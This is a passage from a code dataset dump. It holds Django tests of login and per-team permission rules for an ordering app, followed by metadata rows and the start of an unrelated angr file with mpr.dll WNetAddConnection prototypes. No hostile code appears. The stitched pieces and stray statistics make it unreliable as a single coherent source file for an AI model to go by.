view = resolve("/teams/new")
self.assertEqual(view.func, views.team)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_team_resolves_team(self):
view = resolve("/teams/17")
self.assertEqual(view.func, views.team)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"team_id": 17})
def test_delete_team_resolves_delete_team(self):
view = resolve("/teams/delete/12")
self.assertEqual(view.func, views.delete_team)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"team_id": 12})
def test_purchases_resolves_purchases(self):
view = resolve("/purchases")
self.assertEqual(view.url_name, "purchases")
def test_new_purchase_resolves_new_purchase(self):
view = resolve("/purchases/new")
self.assertEqual(view.func, views.purchase)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_purchase_resolves_purchase(self):
view = resolve("/purchases/17")
self.assertEqual(view.func, views.purchase)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"purchase_id": 17})
def test_delete_purchase_resolves_delete_purchase(self):
view = resolve("/purchases/delete/12")
self.assertEqual(view.func, views.delete_purchase)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"purchase_id": 12})
def test_stockpiles_resolves_stockpiles(self):
view = resolve("/stockpiles")
self.assertEqual(view.url_name, "stockpiles")
def test_new_stockpile_resolves_new_stockpile(self):
view = resolve("/stockpiles/new")
self.assertEqual(view.func, views.stockpile)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_stockpile_resolves_stockpile(self):
view = resolve("/stockpiles/17")
self.assertEqual(view.func, views.stockpile)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"stockpile_id": 17})
def test_delete_stockpile_resolves_delete_stockpile(self):
view = resolve("/stockpiles/delete/12")
self.assertEqual(view.func, views.delete_stockpile)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"stockpile_id": 12})
def test_pillages_resolves_pillages(self):
view = resolve("/pillages")
self.assertEqual(view.url_name, "pillages")
def test_new_pillage_resolves_new_pillage(self):
view = resolve("/pillages/new")
self.assertEqual(view.func, views.pillage)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_pillage_resolves_pillage(self):
view = resolve("/pillages/17")
self.assertEqual(view.func, views.pillage)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"pillage_id": 17})
def test_delete_pillage_resolves_delete_pillage(self):
view = resolve("/pillages/delete/12")
self.assertEqual(view.func, views.delete_pillage)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"pillage_id": 12})
class OrderViewTests(TestCase):
def setUp(self) -> None:
# Various permission objects for convenient use
self.team_permission = Permission.objects.get(codename="view_team")
self.request_permission = Permission.objects.get(codename="request_order")
self.approve_permission = Permission.objects.get(codename="approve_order")
self.receive_permission = Permission.objects.get(codename="receive_order")
self.complete_permission = Permission.objects.get(codename="complete_order")
self.view_permission = Permission.objects.get(codename="view_order")
self.view_all_teams_permission = Permission.objects.get(
codename="view_order_all_teams"
)
self.add_permission = Permission.objects.get(codename="add_order")
self.add_all_teams_permission = Permission.objects.get(
codename="add_order_all_teams"
)
self.change_permission = Permission.objects.get(codename="change_order")
self.change_all_teams_permission = Permission.objects.get(
codename="change_order_all_teams"
)
self.delete_permission = Permission.objects.get(codename="delete_order")
self.delete_all_teams_permission = Permission.objects.get(
codename="delete_order_all_teams"
)
self.team_a = Team.objects.create(name="The A-Team")
self.team_b = Team.objects.create(name="Not the A-Team")
self.product = Product.objects.create(name="Dr. Cave Johnson")
# a user without any permission
self.user = User.objects.create_user("engel", password="engel")
# a user with view permission, and can see teams
self.view_user = User.objects.create_user("loc_engel", password="loc_engel")
self.view_user.user_permissions.add(self.view_permission)
self.view_user.user_permissions.add(self.team_permission)
self.eventA = Event.objects.create(name="Required Event")
def post_order(self, id="new", state="REQ", amount=1, comment="", event=1):
return self.client.post(
"/orders/{}".format(id),
{
"amount": amount,
"product": self.product.id,
"team": self.team_a.id,
"state": state,
"comment": comment,
"event": event,
},
)
def test_view_login_required(self):
response = self.client.get("/orders")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/orders")
def test_can_not_see_orders_without_permission_or_membership(self):
Order.objects.create(product=self.product, team=self.team_a)
Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="engel", password="engel")
response = self.client.get("/orders")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<tbody></tbody>", html=True)
def test_members_can_view_team_orders(self):
self.team_a.members.add(self.user)
Order.objects.create(product=self.product, team=self.team_a)
Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="engel", password="engel")
response = self.client.get("/orders")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "The A-Team")
self.assertNotContains(response, "Not the A-Team")
def test_view_permission_can_see_all_orders(self):
Order.objects.create(product=self.product, team=self.team_a)
Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "The A-Team")
self.assertContains(response, "Not the A-Team")
def test_non_privileged_can_not_add_order_in_any_state(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order("new", "REQ")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
response = self.post_order("new", "APP")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
response = self.post_order("new", "REA")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
response = self.post_order("new", "COM")
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 0)
def test_new_order_has_comment_field(self):
self.view_user.user_permissions.add(self.add_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/new")
print(response.content)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<textarea name="comment" cols="30" rows="3" maxlength="1000" class="textarea form-control" id="id_comment">',
)
def test_add_permission_can_add_anything(self):
self.view_user.user_permissions.add(self.add_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order("new", "REQ")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 1)
response = self.post_order("new", "APP")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 2)
response = self.post_order("new", "REA")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 3)
response = self.post_order("new", "COM")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 4)
def test_request_user_can_request_but_nothing_else(self):
self.view_user.user_permissions.add(self.request_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order("new", "REQ")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 1)
response = self.post_order("new", "APP")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "APP is not one of the available choices")
response = self.post_order("new", "REA")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "REA is not one of the available choices")
response = self.post_order("new", "COM")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "COM is not one of the available choices")
def test_non_privileged_can_not_change(self):
order = Order.objects.create(product=self.product, team=self.team_a)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order(order.id, "REQ")
self.assertEqual(response.status_code, 403)
def test_change_permission_can_change_anything(self):
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.change_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.post_order(order.id, "REQ")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "REQ", 2)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "REQ", 2, 17.00)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "APP")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "REA")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.post_order(order.id, "COM")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
def test_team_members_can_change_some_fields(self):
self.team_a.members.add(self.user)
my_order = Order.objects.create(product=self.product, team=self.team_a)
order = Order.objects.create(product=self.product, team=self.team_b)
self.client.login(username="engel", password="engel")
# we can not change the state
response = self.post_order(my_order.id, "APP")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "APP is not one of the available choices")
# we can change the amount
response = self.post_order(my_order.id, "REQ", 2)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
# we cannot change other teams' orders
response = self.post_order(order.id, "REQ", 2)
self.assertEqual(response.status_code, 403)
# we can not change the order after it was approved
my_order.state = "APP"
my_order.save()
response = self.post_order(my_order.id, "REQ", 2)
self.assertEqual(response.status_code, 403)
def test_approvers_can_update_state(self):
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.approve_permission)
self.client.login(username="loc_engel", password="loc_engel")
# we can approve an order
response = self.post_order(order.id, "APP")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
# we can no longer change this order
response = self.post_order(order.id, "REQ")
def test_require_no_delete_permission_fails(self):
"""Has to fail because the user has no delete permission and is
not in the team we’re trying to delete the order from"""
order = Order.objects.create(product=self.product, team=self.team_a)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 1)
def test_require_only_delete_permission_fails(self):
"""Has to fail because the user is not in the team we’re trying to delete the order from"""
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.delete_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Order.objects.all().count(), 1)
def test_require_delete_all_teams_permission_ok(self):
"""Has to succeed because the user has the delete_order_all_teams permission"""
order = Order.objects.create(product=self.product, team=self.team_a)
self.view_user.user_permissions.add(self.delete_all_teams_permission)
self.view_user.user_permissions.add(self.delete_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
self.assertEqual(Order.objects.all().count(), 0)
def test_team_members_can_delete_orders(self):
"""Has to succeed because the user has the delete_order permission and is member of the team"""
self.team_a.members.add(self.user)
my_order = Order.objects.create(product=self.product, team=self.team_a)
my_approved_order = Order.objects.create(
product=self.product, team=self.team_a, state="APP"
)
order = Order.objects.create(product=self.product, team=self.team_b)
self.user.user_permissions.add(self.delete_permission)
self.client.login(username="engel", password="engel")
response = self.client.post("/orders/delete/{}".format(my_order.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/orders")
response = self.client.post("/orders/delete/{}".format(order.id))
self.assertEqual(response.status_code, 403)
response = self.client.post("/orders/delete/{}".format(my_approved_order.id))
self.assertEqual(response.status_code, 403)
def test_event_preset_by_setting(self):
env = EnvironmentVarGuard()
env.set("DEFAULT_ORDER_EVENT", "12c3")
self.view_user.user_permissions.add(self.add_permission)
Event.objects.create(name="12c3")
Event.objects.create(name="42c3")
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/new")
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<option value="2" selected>12c3</option>')
# This test somehow does not work; when exercising the software manually it behaves as intended and
# uses the last event that was added
# def test_event_use_last(self):
# self.view_user.user_permissions.add(self.add_permission)
# Event.objects.create(name="12c3")
# Event.objects.create(name="42c3")
# self.client.login(username="loc_engel", password="loc_engel")
# response = self.client.get("/orders/new")
# self.assertEqual(response.status_code, 200)
# print(response.status_code)
# print(response.content)
# self.assertContains(response, '<option value="3" selected>42c3</option>')
def test_event_no_event_defined(self):
Event.objects.all().delete()
self.view_user.user_permissions.add(self.add_permission)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/new")
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<option value="" selected>---------</option>')
def test_single_team_preset(self):
self.team_a.members.add(self.user)
self.user.user_permissions.add(self.add_permission)
self.client.login(username="engel", password="engel")
response = self.client.get("/orders/new")
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<option value="1" selected>')
def test_status_can_view_only(self):
"""
Tests if a user having only view rights can load the order view for an existing order
"""
Order.objects.create(product=self.product, team=self.team_a)
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/orders/1")
self.assertEqual(response.status_code, 200)
class OrderExportViewTests(TestCase):
def setUp(self) -> None:
        # Various permission objects for convenient reuse
self.export_permission = Permission.objects.get(codename="export_csv")
# User without rights
self.user = User.objects.create_user("engel", password="engel")
        # A user with the export_csv permission, allowed to export CSV
self.view_user = User.objects.create_user("exporter", password="exporter")
self.view_user.user_permissions.add(self.export_permission)
def test_view_login_required(self):
response = self.client.get("/orders/export")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/orders/export")
def test_non_privileged_can_not_export(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/orders/export")
self.assertEqual(response.status_code, 403)
def test_privileged_can_export(self):
self.client.login(username="exporter", password="exporter")
response = self.client.get("/orders/export")
self.assertEqual(response.status_code, 200)
class ProductViewTests(TestCase):
def setUp(self) -> None:
User.objects.create_user("engel", password="engel")
self.vendor = Vendor.objects.create(name="ACME Inc.")
view_permission = Permission.objects.get(codename="view_product")
user = User.objects.create_user("loc_engel", password="loc_engel")
user.user_permissions.add(view_permission)
add_permission = Permission.objects.get(codename="add_product")
user = User.objects.create_user("order_engel", password="order_engel")
user.user_permissions.add(view_permission)
user.user_permissions.add(add_permission)
change_permission = Permission.objects.get(codename="change_product")
user = User.objects.create_user("order_admin", password="order_admin")
user.user_permissions.add(view_permission)
user.user_permissions.add(change_permission)
delete_permission = Permission.objects.get(codename="delete_product")
user = User.objects.create_user("morre", password="morre")
user.user_permissions.add(view_permission)
user.user_permissions.add(delete_permission)
def test_view_new_product_status_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.get("/products/new")
self.assertEqual(response.status_code, 200)
def test_view_login_required(self):
response = self.client.get("/products")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/products")
def test_require_view_permissions_fails(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/products")
self.assertEqual(response.status_code, 403)
def test_require_view_permissions_ok(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/products")
self.assertEqual(response.status_code, 200)
def test_require_add_permission_fails(self):
self.client.login(username="loc_engel", password="loc_engel")
vendor = Vendor.objects.get(name="ACME Inc.")
response = self.client.post(
"/products/new",
{"name": "Awesome Beer", "unit": "Hectoliter", "vendor": vendor.id},
)
self.assertEqual(response.status_code, 403)
self.assertEqual(Product.objects.all().count(), 0)
def test_require_add_permission_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.post(
"/products/new", {"name": "Awesome Beer", "unit": "Hectoliter"},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/products")
self.assertEqual(Product.objects.all().count(), 1)
def test_require_change_permission_fails(self):
product = Product.objects.create(name="Bad Beer")
vendor = Vendor.objects.get(name="ACME Inc.")
self.client.login(username="order_engel", password="order_engel")
response = self.client.post(
"/products/{}".format(product.id),
{"name": "Awesome Beer", "unit": "Hectoliter", "vendor": vendor.id},
)
self.assertEqual(response.status_code, 403)
self.assertEqual(Product.objects.get(id=product.id).name, "Bad Beer")
def test_require_change_permission_ok(self):
product = Product.objects.create(name="Bad Beer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post(
"/products/{}".format(product.id),
{"name": "Awesome Beer", "unit": "Hectoliter"},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/products")
self.assertEqual(Product.objects.get(id=product.id).name, "Awesome Beer")
def test_require_delete_permission_fails(self):
product = Product.objects.create(name="Bad Beer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/products/delete/{}".format(product.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Product.objects.all().count(), 1)
def test_require_delete_permission_ok(self):
product = Product.objects.create(name="Bad Beer")
self.client.login(username="morre", password="morre")
response = self.client.post("/products/delete/{}".format(product.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/products")
self.assertEqual(Product.objects.all().count(), 0)
class VendorViewTests(TestCase):
def setUp(self) -> None:
User.objects.create_user("engel", password="engel")
view_permission = Permission.objects.get(codename="view_vendor")
user = User.objects.create_user("loc_engel", password="loc_engel")
user.user_permissions.add(view_permission)
add_permission = Permission.objects.get(codename="add_vendor")
user = User.objects.create_user("order_engel", password="order_engel")
user.user_permissions.add(view_permission)
user.user_permissions.add(add_permission)
change_permission = Permission.objects.get(codename="change_vendor")
user = User.objects.create_user("order_admin", password="order_admin")
user.user_permissions.add(view_permission)
user.user_permissions.add(change_permission)
delete_permission = Permission.objects.get(codename="delete_vendor")
user = User.objects.create_user("morre", password="morre")
user.user_permissions.add(view_permission)
user.user_permissions.add(delete_permission)
def test_view_login_required(self):
response = self.client.get("/vendors")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/vendors")
def test_require_view_permissions_fails(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/vendors")
self.assertEqual(response.status_code, 403)
def test_require_view_permissions_ok(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/vendors")
self.assertEqual(response.status_code, 200)
def test_require_add_permission_fails(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/vendors/new", {"name": "Bällebäder for the win"},)
self.assertEqual(response.status_code, 403)
self.assertEqual(Vendor.objects.all().count(), 0)
def test_require_add_permission_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.post("/vendors/new", {"name": "Bällebäder for the win"},)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/vendors")
self.assertEqual(Vendor.objects.all().count(), 1)
def test_require_change_permission_fails(self):
vendor = Vendor.objects.create(name="Kein Bällebadverkäufer")
self.client.login(username="order_engel", password="order_engel")
response = self.client.post(
"/vendors/{}".format(vendor.id), {"name": "Bällebäder for the win"},
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
Vendor.objects.get(id=vendor.id).name, "Kein Bällebadverkäufer"
)
def test_require_change_permission_ok(self):
vendor = Vendor.objects.create(name="Kein Bällebadverkäufer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post(
"/vendors/{}".format(vendor.id), {"name": "Bällebäder for the win"},
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/vendors")
self.assertEqual(
Vendor.objects.get(id=vendor.id).name, "Bällebäder for the win"
)
def test_require_delete_permission_fails(self):
vendor = Vendor.objects.create(name="Bad Beer")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/vendors/delete/{}".format(vendor.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Vendor.objects.all().count(), 1)
def test_require_delete_permission_ok(self):
vendor = Vendor.objects.create(name="Kein Bällebadverkäufer")
self.client.login(username="morre", password="morre")
response = self.client.post("/vendors/delete/{}".format(vendor.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/vendors")
self.assertEqual(Vendor.objects.all().count(), 0)
class TeamViewTests(TestCase):
def setUp(self) -> None:
user = User.objects.create_user("engel", password="engel")
view_permission = Permission.objects.get(codename="view_team")
user = User.objects.create_user("loc_engel", password="loc_engel")
user.user_permissions.add(view_permission)
add_permission = Permission.objects.get(codename="add_team")
user = User.objects.create_user("order_engel", password="order_engel")
user.user_permissions.add(view_permission)
user.user_permissions.add(add_permission)
change_permission = Permission.objects.get(codename="change_team")
user = User.objects.create_user("order_admin", password="order_admin")
user.user_permissions.add(view_permission)
user.user_permissions.add(change_permission)
delete_permission = Permission.objects.get(codename="delete_team")
user = User.objects.create_user("morre", password="morre")
user.user_permissions.add(view_permission)
user.user_permissions.add(delete_permission)
def test_view_login_required(self):
response = self.client.get("/teams")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/accounts/login/?next=/teams")
def test_require_view_permissions_fails(self):
self.client.login(username="engel", password="engel")
response = self.client.get("/teams")
self.assertEqual(response.status_code, 403)
def test_require_view_permissions_ok(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.get("/teams")
self.assertEqual(response.status_code, 200)
def test_require_add_permission_fails(self):
self.client.login(username="loc_engel", password="loc_engel")
response = self.client.post("/teams/new", {"name": "Creatures"})
self.assertEqual(response.status_code, 403)
self.assertEqual(Team.objects.all().count(), 0)
def test_require_add_permission_ok(self):
self.client.login(username="order_engel", password="order_engel")
response = self.client.post("/teams/new", {"name": "Creatures"})
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/teams")
self.assertEqual(Team.objects.all().count(), 1)
def test_require_change_permission_fails(self):
team = Team.objects.create(name="BadWolf")
self.client.login(username="order_engel", password="order_engel")
response = self.client.post("/teams/{}".format(team.id), {"name": "GoodWolf"})
self.assertEqual(response.status_code, 403)
def test_require_change_permission_ok(self):
team = Team.objects.create(name="BadWolf")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/teams/{}".format(team.id), {"name": "GoodWolf"})
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/teams")
def test_require_delete_permission_fails(self):
team = Team.objects.create(name="EvilTeam")
self.client.login(username="order_admin", password="order_admin")
response = self.client.post("/teams/delete/{}".format(team.id))
self.assertEqual(response.status_code, 403)
self.assertEqual(Team.objects.all().count(), 1)
def test_require_delete_permission_ok(self):
team = Team.objects.create(name="EvilTeam")
self.client.login(username="morre", password="morre")
response = self.client.post("/teams/delete/{}".format(team.id))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/teams")
self.assertEqual(Team.objects.all().count(), 0)
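# A hedged refactor sketch (assumption: the repeated user/permission fixtures in
# the setUp methods above could be collapsed into one module-level helper without
# changing any test's behaviour):
# def create_user_with_permissions(username, *codenames):
#     user = User.objects.create_user(username, password=username)
#     for codename in codenames:
#         user.user_permissions.add(Permission.objects.get(codename=codename))
#     return user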
| 45.848524
| 122
| 0.678323
| 4,341
| 35,716
| 5.402903
| 0.053214
| 0.125991
| 0.098064
| 0.087789
| 0.867144
| 0.815895
| 0.803871
| 0.758549
| 0.728447
| 0.718982
| 0
| 0.011638
| 0.191623
| 35,716
| 778
| 123
| 45.907455
| 0.800707
| 0.041998
| 0
| 0.623794
| 0
| 0.001608
| 0.117775
| 0.007852
| 0
| 0
| 0
| 0
| 0.336013
| 1
| 0.135048
| false
| 0.104502
| 0.009646
| 0.001608
| 0.155949
| 0.001608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8805d7eaa3217f955c133efc048967ed1fc34e64
| 32,688
|
py
|
Python
|
angr/procedures/definitions/win32_mpr.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mpr.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mpr.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("mpr.dll")
prototypes = \
{
#
'WNetAddConnectionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpRemoteName", "lpPassword", "lpLocalName"]),
#
'WNetAddConnectionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpRemoteName", "lpPassword", "lpLocalName"]),
#
'WNetAddConnection2A': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
'WNetAddConnection2W': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
'WNetAddConnection3A': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
'WNetAddConnection3W': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserName", "dwFlags"]),
#
